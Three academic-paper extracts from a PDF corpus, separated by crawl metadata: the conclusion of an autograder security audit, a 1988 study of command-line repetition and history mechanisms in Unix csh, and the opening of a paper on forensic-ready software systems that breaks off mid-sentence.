logs any use of system calls which it considers particularly illicit. While an attack that managed to escape the jail would have gone unnoticed, the logging system would have detected any failed exploitation attempts leading up to the successful attack. Logs are only useful if someone reads them; therefore, systems should notify administrators in the event of notable violations. The benefits of effective detection are predicated on the truth of our assumption that autograder submissions are tied to the identity of the submitting student. Two of the autograders we surveyed, EECS 485 and EECS 370, failed in this regard. EECS 485 allowed students to access their classmates’ code over the internet, rendering it difficult or impossible to identify the culprit, while EECS 370 allowed students to tie arbitrary submissions to the names of other students. This vulnerability is particularly serious, as it not only allows students to get away with cheating or bringing down the autograder, but also allows them to blame the attack on someone else, which may endanger the victim’s career or academic standing. Because detection can significantly strengthen security and because incorrect attribution of submissions can cause serious harm, we conclude that accurate identification of students is the single most important defensive measure an autograder can have. 10 Future Work While our examination of the four department autograders has both increased the security of courses at the University of Michigan and provided valuable insights into the topic of autograder design and implementation, four systems comprise a small sample size. Ideally, future work would study a larger number of systems from several different universities. A more diverse set of subjects would provide a better picture of the state of the art and would likely yield more widely applicable conclusions regarding autograder security. 11 Acknowledgments We would like to thank the staffs of EECS 280, EECS 281, EECS 370, and EECS 485 for providing access to their autograding systems. In particular, we would like to thank James Perretta, Waleed Khan, and Don Winsor for their considerable assistance in setting up and using their autograder systems. The support of our professor, Alex Halderman, allowed this project to get off the ground, and his weekly security lectures provided us the proper skills and mindset to succeed in our penetration testing. 12 Availability Code for the attacks described in this document is available at: https://ianpudney.com/autograder-audit Source code for the autograders and exfiltrated test cases will not be made public, per section 4. References Appendix A Diagrams Figure 1: A diagram showing the process of bypassing EECS 281 performance limitations, as described in section 5.3
{"Source-Url": "https://ianpudney.com/autograder-audit/paper/autograder-audit.pdf", "len_cl100k_base": 7238, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 25931, "total-output-tokens": 8192, "length": "2e12", "weborganizer": {"__label__adult": 0.0010519027709960938, "__label__art_design": 0.0009927749633789062, "__label__crime_law": 0.0097503662109375, "__label__education_jobs": 0.05364990234375, "__label__entertainment": 0.0002503395080566406, "__label__fashion_beauty": 0.0004911422729492188, "__label__finance_business": 0.0007534027099609375, "__label__food_dining": 0.000904083251953125, "__label__games": 0.002422332763671875, "__label__hardware": 0.0039520263671875, "__label__health": 0.0015392303466796875, "__label__history": 0.0007615089416503906, "__label__home_hobbies": 0.0003323554992675781, "__label__industrial": 0.0014848709106445312, "__label__literature": 0.0009174346923828124, "__label__politics": 0.0009870529174804688, "__label__religion": 0.0009012222290039062, "__label__science_tech": 0.1595458984375, "__label__social_life": 0.00054168701171875, "__label__software": 0.030029296875, "__label__software_dev": 0.72607421875, "__label__sports_fitness": 0.0008091926574707031, "__label__transportation": 0.0013599395751953125, "__label__travel": 0.0003554821014404297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 36922, 0.0375]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 36922, 0.47519]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 36922, 0.9404]], "google_gemma-3-12b-it_contains_pii": [[0, 3560, false], [3560, 8536, null], [8536, 13103, null], [13103, 17608, null], [17608, 21916, null], [21916, 26887, null], [26887, 31919, null], [31919, 36786, null], [36786, 36922, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3560, true], [3560, 8536, null], [8536, 13103, null], [13103, 17608, null], [17608, 21916, null], [21916, 26887, null], [26887, 31919, null], [31919, 36786, null], [36786, 36922, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 36922, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 36922, null]], "pdf_page_numbers": [[0, 3560, 1], [3560, 8536, 2], [8536, 13103, 3], [13103, 17608, 4], [17608, 21916, 5], [21916, 26887, 6], [26887, 31919, 7], [31919, 36786, 8], [36786, 36922, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 36922, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
7f6ae168f6874aa5ac6abf9f5a072c223b39c1ba
How Users Repeat Their Actions on Computers: Principles for Design of History Mechanisms Saul Greenberg and Ian H. Witten Department of Computer Science The University of Calgary, Calgary, Alberta, Canada T2N 1N4 Abstract Several striking characteristics of how often people repeat their actions on interactive systems are abstracted from usage data gleaned from many users of different classes over a period of months. Reformulated as empirically-based general principles, these provide design guidelines for history mechanisms specifically and modern user interfaces generally. Particular attention is paid to the repetition of command lines, and to the probability distribution of the next line given a sequential "history list" of previous ones. Several ways are examined of conditioning this distribution to enhance predictive power. A brief case study of actual use of a widely-used history system is also included. Keywords: Command-based systems; command re-use; history mechanisms; human-computer interaction; design principles. Introduction Flexible interfaces create an environment in which users can pursue goals not considered specifically by any one application package. This paper addresses those top-level interfaces that provide a rich set of executable actions and objects. Actions are traditionally invoked by typing simple commands, although some modern systems augment or replace this primitive dialogue style with menus, forms, natural language, graphics, and so on [19]. Typically, these interfaces either provide uniform access to all system actions or group these actions in some pre-defined way. Human usage of such computers is characterized by certain patterns of activity that are ill supported by contemporary interfaces. In particular, although it is well known that users often repeat actions, most systems do little to allow them to review and re-execute previous ones. Typically, they must be laboriously re-typed or re-selected through menu navigation. Those systems that do provide assistance offer ad hoc "history" mechanisms that employ a variety of recall strategies: History through glass teletypes. Special textual syntactic constructs allow previous events to be recalled, usually by position on an event list (relative or absolute), or by pattern-matching. Examples are the UNIX csh [12] and the INTERLISP-D Programmer's Assistant [16]. History through graphical selection. A menu of previous events is presented which are manipulated graphically. HISTMENU[5] and MINIT's "window management window" [4] are two examples. History through editing. Any text appearing in the dialogue transcript can be copied to and edited further in the command input area. Examples include Apollo's DOMAIN window "pads" [1] and command interpreters running within the emacs editor [14]. History for menu navigation. Previously chosen menu items become more readily available than the default. The "bookmarks" capability of the Symbolics Document Examiner is one example [15]. Another is an adaptive algorithm that favourably relocates previously chosen items in a menu hierarchy [20], which has found success in an experimental telephone directory [9,17]. History through prediction. Within the current context, the system estimates for each token already seen the probability that it will be the next one typed. The one(s) with the highest probabilities are made available for selection (eg "Predict" [22] and the "Reactive Keyboard" [21]). History through programming by example. Fixed sequences of actions are saved as a procedure, perhaps allowing some generalizations to be made [18]. Most history mechanisms are based on the simple premise that the last n user inputs are a reasonable working set of candidates for re-selection. But is this premise correct? Might other strategies work better? Indeed, is the dialogue sufficiently repetitive to warrant history mechanisms in the first place? As existing systems are designed through intuition rather than from empirical knowledge of user interactions, it is difficult to judge how effective they really are or what scope there is for improvement. Cite as: <table> <thead> <tr> <th>Sample Name</th> <th>Sample Size</th> <th>Recurrence Rate mean std dev</th> <th>Users of History actual (%)</th> <th>Mean rate of history uses (%)</th> </tr> </thead> <tbody> <tr> <td>Novice Programmers</td> <td>55</td> <td>80.4% 7.2</td> <td>11/55 20%</td> <td>2.03</td> </tr> <tr> <td>Experienced Programmers</td> <td>36</td> <td>74.4% 9.7</td> <td>33/36 92%</td> <td>4.23</td> </tr> <tr> <td>Computer Scientists</td> <td>52</td> <td>67.7% 8.2</td> <td>37/52 71%</td> <td>4.04</td> </tr> <tr> <td>Non-Programmers</td> <td>25</td> <td>69.4% 8.1</td> <td>9/25 36%</td> <td>4.35</td> </tr> <tr> <td>Total</td> <td>168</td> <td>73.8% 9.6</td> <td>90/168 54%</td> <td>3.89</td> </tr> </tbody> </table> Table 1: Sample sizes, recurrence rates and history uses of each group This paper investigates user behavior relevant to the design of history mechanisms. The primary objective is to formulate general principles of how users repeat their actions on computers. The investigation is based upon analysing long-term records of user-computer interaction with an imperative interface, collected as described in the following section. The research questions raised in the subsequent section help focus exploration of the large data set, and the results are analyzed from a variety of perspectives. A discussion follows in the last section, where specific principles are developed. The UNIX `csh` command interpreter was used as a vehicle for this study, as it has been for many earlier investigations of how users interact with command-based interfaces. Its popularity makes it relatively easy to find and observe diverse sample groups of users in a realistic setting \(^1\). Although the command interface no longer represents current ideas in interface design, it is assumed that observed usage patterns are fundamental to similar computer-based imperative interactions. Studies of UNIX usage have already affected the design of leading-edge systems. For example, [6] described a multiple virtual-workspace interface to support user task switching, motivated by the UNIX study of [2]. **Data Collection** Command-line data was collected continuously for four months from users of the Berkeley 4.2 UNIX `csh` command interpreter [12]. The start of every login session was noted, and all commands and arguments passed to `csh` were recorded sequentially. Each command entry was annotated with the current working directory, history and alias usage, and system errors (if any). From the user's point of view, the monitoring facility was unobtrusive — the modified command interpreter was identical in all visible respects to the standard version. Four target groups were identified, representing a total of 168 users with a wide cross-section of computer experience and needs (Table 1). Salient features of each group are described below. **Novice Programmers.** Enrolled from an introductory Pascal course, these have little or no previous exposure to programming, operating systems, or UNIX-like command-based interfaces. Subjects spend most of their computer time learning how to program and use the basic system facilities. **Experienced Programmers.** Members were senior Computer Science undergraduates, expected to have a fair knowledge of programming languages and the UNIX environment. As well as coding, word processing, and employing more advanced UNIX facilities to fulfill course requirements, subjects also use the system for social and exploratory purposes. **Computer Scientists.** This group, comprised of Faculty, graduates and researchers from the Department of Computer Science, is very familiar with UNIX. Tasks performed are less predictable and more varied than other groups, spanning advanced program development, research investigations, social communication, maintaining databases, word-processing, satisfying personal requirements, and so on. **Non-programmers.** Word-processing and document preparation is the dominant activity of this group, made up of office staff and members of the Faculty of Environmental Design. Little program development occurs — tasks are usually performed with existing application packages. Knowledge of UNIX is the minimum required to get the job done. Considerable variation was present in the number of command lines entered by individual subjects (\(mean = 1712, std dev = 1499\)). **Data Analysis** Four questions particularly relevant to history mechanisms are addressed here. They all concern the statistics of complete command lines entered by the user, since history mechanisms usually involve the whole command line. First, we look at how often a user actually repeats command lines over the course of a dialogue. Second, we describe the probability distribution that the next command line will match a user's previous inputs by location in an event list. Third, since this distribution depends upon a simple model of arranging and matching the user's command history, alternative models are evaluated which condition the distribution in different ways. Finally, we note how people actually use the existing UNIX `csh` history facility. \(^1\) But see [3] for problems encountered even here. In the following discussion, a command line is a single complete line (up to a terminating carriage return) entered by the user. This is a natural unit because commands are only interpreted by the system when the return key is typed. Command lines typically comprise an action (the command), an object (e.g., files, strings) and modifiers (options). A sequential record of command lines entered by a user over time, ignoring boundaries between login sessions, is called a history list. Unless stated otherwise, the history list is a true record of every single line typed — duplicates are not pruned. The distance between two command lines is the difference between their positions on the list. A working set is a small subset of items on the history list. The number of different entries in the history list is the command line vocabulary. Although white space is ignored, syntactically different but semantically identical lines are considered distinct. Recurrence of command lines Most history mechanisms simplify redoing the complete command line, rather than its isolated components. Although it is known that only a small set of commands account for all user actions [2,7,8,11,13] \(^2\), it is not known how often complete command lines recur. One might expect that they would not recur often, given the limitless possibilities and combinations of commands, modifiers and arguments. Surprisingly, this is not the case. Although users extend their vocabulary of command lines continuously and uniformly over the duration of an interaction, the majority of lines entered are recurrences. Table 1 lists the mean recurrence rate and standard deviation for each subject group. An analysis of variance of raw scores rejects the null hypothesis that these means are equal \((F(3, 164) = 21.42, p < .01)\). The Fisher PLSD multiple comparison test suggests that all differences between group means are significant \((p < .01)\), excepting the Non-programmers versus Scientists. As the Table indicates, the mean recurrence rate for groups ranges between 68% and 80%, with Novice Programmers exhibiting the highest scores. Still, it is reasonable to approximate the recurrence rate by the population mean of 74%. That is, about three out of every four command lines entered by the user already exist on the history list. Conversely, an average of one out of every four appears for the first time. Command line frequency as a function of distance For any command line entered by a user, the probability that it has been entered previously is quite high. But what is the probability distribution of that recurrence over each previous input? Are recurrence distances, for example, spread uniformly across the distribution or skewed to the most recently entered items? If a graphical history mechanism displayed the previous \(n\) entries as a menu (e.g., HISTMENU [5]), what is the probability that this includes the next entry? The recurrence distribution as a measure of distance was calculated for each user, and group means are plotted in Figure 1. The vertical axis represents the rate of command line recurrences, while the horizontal axis shows the position of the repeated command line on the history list relative to the current one. Taking Novice Programmers, for example, there is an 11% probability that the current command line is a repeat of the previous entry (distance = 1), 28% for a distance of two, and so on. The most striking feature of the Figure is the extreme recency of the distribution. The previous seven or so inputs contribute the vast majority of recurrences. It is not the last but the second to last command line that dominates the distribution. The first and third are roughly the same, while the fourth through seventh give small but significant contributions. Although probability values continually decrease after the second item, the rate of decrease and the low values make all distances beyond the previous ten items practically equivalent. This is illustrated further in the inset of Figure 1, which plots the same data for the grouped total as a running sum of the probability over a wider range of distances. The most recently entered command lines on the history list are responsible for most of the accumulated probabilities. In comparison, all further contributions are slight (although their sum total is not). The horizontal line at the top represents a ceiling to the recurrence rate, as 26% of all command lines entered are first occurrences. Figure 1 also shows that the differing recurrence rate between user groups, noted previously in Table 1, can be attributed to the three previous command lines. Recurrence rates are practically identical elsewhere in the distribution. This difference is strongest on the second to last input, the probability ranging from a low of 10% for Scientists to a high of 28% for Novice Programmers. Conditioning the distribution The recurrence distributions were derived by considering all user input as one long sequential stream, with no barriers placed between sessions. We have seen that a small local working set of command lines accounts for a high portion of repetitions. Consider a working set of the seven previous items on the history list. From the inset in Figure 1, there is a 26% chance that the next command line has not appeared before, a 43% chance that it has recurred within the working set, and a 31% chance that it last appeared further back. This section explores the possibility that the distribution can be conditioned to increase the recurrence probabilities. Three conditioning techniques are discussed: context sensitivity by directory; pruning repetitions; and par- \(^2\)This aspect of our study is reported in greater detail in a companion paper, which includes a discussion on individual differences in command selection and use [8] Figure 1: Recurrence distribution as a measure of distance dundancies, as described by [4]. The first saves the command line in its original position on the history list while the second saves it in its latest position (Table 2). The latter was selected for study, as not only is local context maintained, but unique and low probability entries will migrate to the back of the list over time. Partial Matches. Instead of the next command line matching a previous one exactly, partial matching may be allowed. This is helpful when people make simple spelling mistakes, the same command and options are invoked on different arguments, command lines are extended, and so on. However, the benefit is highly user-dependent, for the selected sequence must be altered before it is invoked. We investigated partial matches by prefix, where the matched command line is a prefix of the next command line, up to and including a complete match. Combinations. The strategies above are not mutually exclusive, and all can be combined in a variety of ways. The bottom half of columns 2 and 3 of Table 2 shows one such possibility, where the event list is conditioned by directory sensitivity and pruning. Data from the Experienced Programmers subject group, each of whom used more than one directory, was reanalyzed by applying the above conditions to the traces. The cumulative probability distributions of all conditions and their combinations are illustrated graphically in Figure 2. Creating context-sensitive directory lists decreases the overall recurrence rate from 74% to 65%, as command lines entered in one directory are no longer available in others. Although this reduction means that plain sequential lists out-perform directory-sensitive ones over all previous entries, benefits were observed over small --- 2 Properly associating a user's commands with their tasks or goals is not easy. We recognize that grouping commands by the current directories (or perhaps by the obvious alternative of windows) is just an estimate — possibly a poor one — of actual task contexts. 3 In Unix, users change directories through the cd command. The ~ is shorthand for the home directory. Following ~/’s indicate sub-directories. <table> <thead> <tr> <th>Sequential starting in ~/.text</th> <th>Directory sensitive directory context is ~/.text</th> <th>Sensitive directory context is ~/.figures</th> <th>Duplicates Removed original position</th> <th>latest position</th> </tr> </thead> <tbody> <tr> <td>1 ls</td> <td>1 ls</td> <td>6 ls</td> <td>1 ls</td> <td>4 edit draft</td> </tr> <tr> <td>2 edit draft</td> <td>2 edit draft</td> <td>7 edit fig1</td> <td>2 edit draft</td> <td>8 edit fig2</td> </tr> <tr> <td>3 print draft</td> <td>3 print draft</td> <td>8 edit fig2</td> <td>3 print draft</td> <td>9 graph fig1</td> </tr> <tr> <td>4 edit draft</td> <td>4 edit draft</td> <td>9 graph fig1</td> <td>5 cd ~/.figures</td> <td>10 ls</td> </tr> <tr> <td>5 cd ~/.figures</td> <td>5 cd ~/.figures</td> <td>10 ls</td> <td>7 edit fig1</td> <td>11 edit fig1</td> </tr> <tr> <td>6 ls</td> <td>13 print draft</td> <td>11 edit fig1</td> <td>8 edit fig2</td> <td>12 cd ~/.text</td> </tr> <tr> <td>7 edit fig1</td> <td>14 cd ~/.figures</td> <td>12 cd ~/.text</td> <td>9 graph fig1</td> <td>13 print draft</td> </tr> <tr> <td>8 edit fig2</td> <td></td> <td></td> <td>12 cd ~/.text</td> <td>14 cd ~/.figures</td> </tr> <tr> <td>9 graph fig1</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>10 ls</td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>11 edit fig1</td> <td>1 ls</td> <td>8 edit fig2</td> <td></td> <td></td> </tr> <tr> <td>12 cd ~/.text</td> <td>4 edit draft</td> <td>9 graph fig1</td> <td></td> <td></td> </tr> <tr> <td>13 print draft</td> <td>13 print draft</td> <td>10 ls</td> <td></td> <td></td> </tr> <tr> <td>14 cd ~/.figures</td> <td>14 cd ~/.figures</td> <td>11 edit fig1</td> <td></td> <td></td> </tr> </tbody> </table> Table 2: Four examples of a conditioned event list ![Figure 2: Conditioning the probability distribution](image-url) working sets. The first three directory-sensitive items are more probable than their equivalent sequential items, approximately equal for the fourth, and slightly less likely thereafter. With a working set of ten items, directory sensitivity increases the overall probability of the working set by 2.5%. Although pruning duplicates off the history list does not alter the recurrence rate, it does shorten the total distance covered by the distribution. As the working set size increases, so do the accumulated probabilities when compared to the standard sequential list (Figure 2). Pruning duplicates increases the overall probability of a ten-item working set by 5%. Pattern matching by prefixes increases the recurrence rate to 84%.\(^5\) As partial matches are found before more distant (and perhaps non-existent) exact matches, an increase is expected in the rate of growth of the cumulative probability distribution. This increase is illustrated in Figure 2. Conditioning by partial matching increases the overall probability of a ten-item working set by around 6%. When conditioning methods are combined, the effects are slightly less than additive. Figure 2 illustrates these combinations. For example, a partially-matched, pruned and directory sensitive history mechanism out-performs a plain sequential one by 13% with a working set of ten items. **Actual use of Unix history** We have seen that user dialogues are highly repetitive and that the last few command lines have the greatest chance of recurring — the premise behind most history systems. But are current history mechanisms used well in practice? We investigated this by analysing each user’s `csh` history use. The recurrence rate and its probability distribution, studied previously, provides a value against which to assess how well history mechanisms are used in practice. The average rate of re-selecting items through history cannot exceed the recurrence rate, which was found to be 74%. By comparing the user’s actual re-selection rate when using a particular history mechanism with this maximum, the system’s practical effectiveness can be judged. Table 1 shows how many users of UNIX `csh` in each sample group actually used history. Although 54% of all users recalled at least one previous action, this figure is dominated by the computer sophisticates. Only 20% of Novice Programmers and 36% of Non-Programmers used history, compared to 71% for Computer Scientists and 92% for Experienced Programmers. Those who made use of history did so rarely. On average, 3.9% of command lines referred to an item through history, although there was great variation (\(\text{std dev} = 3.8; \text{range} = 0.05\% - 17.5\%\)). This average rate varied slightly across groups, as illustrated by the last column in Table 1, but an analysis of variance indicated that differences are not statistically significant (\(F(3, 86) = 1.02\)). In practice, users did not normally refer very far back in history. With the exception of novices, an average of 79 – 86% of all history uses referred to the last five command lines. Novice Programmers achieved this range within the last two command lines. Figure 3 illustrates the nearsighted view into the past. Each line is the running sum of the percent of history use accounted for (the vertical axis) when matched against the distance back in the command line sequence (the horizontal axis). The differences between groups for the last few actions reflect how far back each prefers to see. Although most uses of history recall the last or second last entry, it is unclear which is referred to more. --- \(^5\)In this context, the recurrence rate is the probability that any previous event is a prefix of the current command line. It was also noticed that history was generally used to access or slightly modify the same small set of command lines repeatedly within a login session. If history was used to recall a command line, it was highly probable that subsequent history recalls will be to the same command. Subjects indicated that they are discouraged from using csh by its difficult syntax, the incomprehensible manual entry, and the fact that previous events are not normally kept on display. Also, the typing overhead necessary to specify all but the simplest retrievals makes them feel that it is not worth the bother. Discussion Our analyses of command line recurrences within the UNIX csh dialogue produced specific results in several areas. Based on these results we formulate some empirically-based general principles of how users repeat their actions on computers. 1. A substantial portion of each user's previous actions are repeated. In spite of the large number of options and arguments that could qualify a command, command lines are repeated surprisingly often. 2. New command lines are composed regularly. Although many actions are repeated, a sizeable proportion are new. 3. Users exhibit considerable recency. The major contributions to the recurrence distribution are provided by the last few command lines entered, independent of context. 4. Some actions remain outside the local working set. A significant number of recurring items are not covered by the last few items. Doubling or even tripling the size of the working set does not increase the coverage significantly. 5. Working sets can be improved by suitable conditioning. A perfect "history oracle" would always predict the next user command line correctly, if it was a repeat of a previous one. As no such oracle exists, we can only contemplate and evaluate methods that offer the user reasonable candidates for re-selection. Although simply looking at the previous n user actions is reasonably effective, context sensitivity, pruning duplicates and partial matches increase coverage to some degree. 6. When using history, users continually recall the same command lines. UNIX users generally use history for recalling the same events within a log-in session. 7. Unix csh history does poorly. Most people (especially novices and non-programmers) don't use it. Those who do, don't use it much. General design guidelines are self-evident from these principles. Once the style of interface is specified, the guidelines formed could become much more specific. For example, if a menu of the previous n items are to be displayed, and no user data is available, the best value of n could be estimated from the recurrence distributions shown in this paper. Similarly, the complexity required by syntactic constructs used to retrieve command lines in glass-teletype history mechanisms can be judged (ie constructs retrieving probable command lines should be simple). Or perhaps context conditioning for window-based interfaces are defined by window context, rather than by directory. It is beyond the scope of this short paper to discuss all possibilities. Conclusions This paper has set out empirically-justified principles of how people repeat command lines, and indicated that the high recurrence rate observed justifies the inclusion of history mechanisms to certain user interfaces. Using these principles, designers now have a basis for evaluating and fine-tuning existing history mechanisms, or creating new ones. There are still many unanswered questions. We have not formed any hypotheses of why users repeat their actions the way they do. Nor do we know how generalizable our results are. We are now in the process of extending this investigation, both through further analysis and through applying our results to the design and implementation of a window-based history mechanism, and are working towards integrating history with task-oriented workspaces [10]. References
{"Source-Url": "http://grouplab.cpsc.ucalgary.ca/grouplab/uploads/Publications/Publications/1988-RepeatActions.CHI.pdf", "len_cl100k_base": 5694, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 9144, "total-output-tokens": 7241, "length": "2e12", "weborganizer": {"__label__adult": 0.0003807544708251953, "__label__art_design": 0.002521514892578125, "__label__crime_law": 0.00026679039001464844, "__label__education_jobs": 0.00624847412109375, "__label__entertainment": 0.00023484230041503904, "__label__fashion_beauty": 0.00021195411682128904, "__label__finance_business": 0.0003709793090820313, "__label__food_dining": 0.0003342628479003906, "__label__games": 0.0008912086486816406, "__label__hardware": 0.003017425537109375, "__label__health": 0.00063323974609375, "__label__history": 0.0005927085876464844, "__label__home_hobbies": 0.00016069412231445312, "__label__industrial": 0.0004143714904785156, "__label__literature": 0.00098419189453125, "__label__politics": 0.00023829936981201172, "__label__religion": 0.0004799365997314453, "__label__science_tech": 0.167724609375, "__label__social_life": 0.00015819072723388672, "__label__software": 0.05572509765625, "__label__software_dev": 0.75732421875, "__label__sports_fitness": 0.0002288818359375, "__label__transportation": 0.0005097389221191406, "__label__travel": 0.00019037723541259768}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 32473, 0.0255]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 32473, 0.65665]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 32473, 0.91709]], "google_gemma-3-12b-it_contains_pii": [[0, 4420, false], [4420, 9789, null], [9789, 15638, null], [15638, 17860, null], [17860, 20900, null], [20900, 24648, null], [24648, 29244, null], [29244, 32473, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4420, true], [4420, 9789, null], [9789, 15638, null], [15638, 17860, null], [17860, 20900, null], [20900, 24648, null], [24648, 29244, null], [29244, 32473, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 32473, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 32473, null]], "pdf_page_numbers": [[0, 4420, 1], [4420, 9789, 2], [9789, 15638, 3], [15638, 17860, 4], [17860, 20900, 5], [20900, 24648, 6], [24648, 29244, 7], [29244, 32473, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 32473, 0.17557]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
1f5187aaaf54b569b719062e2d266bada91edc57
Towards forensic-ready software systems Conference or Workshop Item How to cite: For guidance on citations see FAQs. https://creativecommons.org/licenses/by-nc-nd/4.0/ Copyright and Moral Rights for the articles on this site are retained by the individual authors and/or other copyright owners. For more information on Open Research Online’s data policy on reuse of materials please consult the policies page. Towards Forensic–ready Software Systems Conference Paper · January 2018 DOI: 10.1145/3183399.3183426 CITATIONS 0 READS 314 6 authors, including: Liliana Pasquale University of Limerick 60 PUBLICATIONS 767 CITATIONS Dalal Alrajeh Imperial College London 32 PUBLICATIONS 215 CITATIONS Thein Than Tun The Open University (UK) 60 PUBLICATIONS 499 CITATIONS Some of the authors of this publication are also working on these related projects: Adaptive Security and Privacy View project Towards Forensic-Ready Software Systems Liliana Pasquale University College Dublin, Ireland Dalal Alrajeh Imperial College London, UK Claudia Peersman University of Bristol, UK Thein Tun The Open University, UK Bashar Nuseibeh The Open University, UK & Lero, Ireland Awais Rashid University of Bristol, UK ABSTRACT As software becomes more ubiquitous, and the risk of cyber-crimes increases, ensuring that software systems are forensic-ready (i.e., capable of supporting potential digital investigations) is critical. However, little or no attention has been given to how well-suited existing software engineering methodologies and practices are for the systematic development of such systems. In this paper, we consider the meaning of forensic readiness of software, define forensic readiness requirements, and highlight some of the open software engineering challenges in the face of forensic readiness. We use a real software system developed to investigate online sharing of child abuse media to illustrate the presented concepts. CCS CONCEPTS • Software and its engineering → Requirements analysis; • Applied computing → Evidence collection, storage and analysis; KEYWORDS Requirements, Forensic readiness, Forensic-ready Systems, Digital Forensics ACM Reference Format: 1 INTRODUCTION Forensic readiness represents the capability of an organization to support digital investigations proactively, i.e., before an incident occurs [24]. It is realized through the production of evidence that (i) facilitates the investigation and demonstration of compliance to organizational and regulatory policies, and (ii) can support legal proceedings [9]. To date, however, researchers’ attention has been geared towards the provision of general guidelines that could potentially enhance organizations’ operational and infrastructural capabilities to achieve forensic readiness. Little or no attention has been given to how the software systems deployed within these organizations can be designed to be themselves forensic-ready. With a rapid rise in cybercrime and cyber-enabled crime—number of identity theft incidents increased by 222% in 2016 [7] whilst online child sexual exploitation increased by 135% in 2016 [21]—there is an urgent need to consider what forensic readiness means for software systems and how such readiness can be incorporated as part of software development processes. Work in this area is either very preliminary or has been limited to specific aspects of forensic readiness, such as ensuring that evidence relevant to potential incidents is preserved [3, 17, 19] or that evidence integrity is maintained [16]. No work to date has considered the wider potential or implication of rigorous software engineering on the development of forensic-ready systems. Our vision is to investigate the notion of forensic readiness in software systems and understand how forensic-ready software systems can be developed systematically. To achieve this vision we investigate forensic readiness requirements over software systems and assumptions over their encompassing environment. Requirements and assumptions can be used to derive implementable software specifications that achieve forensic readiness. Some of these requirements are data-centred, aimed to ensure availability, relevance, minimalism, non-repudiation, completeness, and linkability of data. Others are process-centred, aimed to ensure that the process through which the software system performs digital forensic activities is sound. We elicit forensic readiness requirements by reviewing existing literature and examining a real world investigative toolkit, iCOP [20], which was designed with the purpose of facilitating investigations of online child abuse media shared through P2P networks. Finally, we present open research challenges that relate to different aspects of engineering forensic-ready software systems and that consider how such systems can operate within emerging cyber-physical environments. 2 SOFTWARE FORENSIC READINESS Although forensic readiness is a notion that is not new in the context of digital forensics, what it means and how it is conceptualised, differs amongst researchers, e.g., [11, 22, 24, 27]. In this paper, we are interested in what forensic readiness means for software engineering practices. At the heart of digital forensic readiness is the digital data, including the media and the activity logs available within an organization’s information system network, or on users’ devices. These data could hold valuable information about how a particular incident occurred and by whom, potentially resulting in a successful prosecution of the perpetrator [5, 13]. In this context, forensic readiness of system network or devices implies maximal usefulness of the data held as potential digital evidence. admissible in court. Such usefulness can only be attained if the data and the process through which they are acquired, analysed and stored is forensically sound. (A forensically sound process is one that maximizes the evidentiary weight of digital evidence [18], whilst forensically sound evidence is one that can endure legal scrutiny in a court of law [10].) We take the view that forensic readiness in the context of software engineering is a property that encapsulates the capabilities of software to: (1) conduct digital forensic processes in a forensically sound way; and (2) produce forensically sound evidence. As we are concerned with developing software that ensures forensic soundness of data and processes, prior to the occurrence of an incident or attack, such capabilities must be proactive. Furthermore, we consider forensic readiness to be a property that is achievable either partially or fully, depending on the software capabilities, and is with respect to a set of speculated incidents that an organization has identified and assessed as critical. 3 MOTIVATING EXAMPLE To provide a sense of our envisaged research direction and challenges to overcome, we discuss the iCOP toolkit [20]. This has the main purpose of identifying, preserving and analysing new or previously unknown child sexual abuse (CSA) media shared by suspects on peer-to-peer (P2P) networks. As shown in Figure 1, iCOP has two major components: the P2P Engine and the Analysis Engine. The P2P engine monitors information (e.g., IP addresses, 